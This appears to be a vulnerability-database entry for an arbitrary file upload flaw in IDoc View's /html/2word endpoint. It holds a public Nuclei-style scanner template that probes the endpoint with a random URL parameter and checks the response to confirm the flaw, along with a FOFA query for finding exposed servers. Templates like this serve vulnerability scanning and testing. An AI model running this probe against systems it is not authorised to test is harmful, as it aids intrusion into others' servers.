idocview-2word-fileupload: IDoc View /html/2word - Arbitrary File Upload

Date: 2025-08-01 | Affected software: idocview-2word-fileupload | PoC: public

Vulnerability description

PoC code [public]

id: idocview-2word-fileupload

info:
  name: IDoc View /html/2word - Arbitrary File Upload
  author: DhiyaneshDK
  severity: high
  metadata:
    verified: true
    max-request: 1
    fofa-query: title=="在线文档预览 - I Doc View"
  tags: idoc,rce,instrusive,file-upload,vuln

variables:
  file: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/html/2word?url={{file}}"

    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - "{{md5(file)}}.docx"

      - type: status
        status:
          - 200
# digest: 490a004630440220724762540cb2c1bcd96d108d2ef238c904bccf7e82b48d80882d8eb54fafd5ee02202fdf8ded3558c7d41c3866e0f92ecad2a6a3656d0a0bdb04c784ed91f5e15df0:922c64590222798bb761d5b6d8e72950
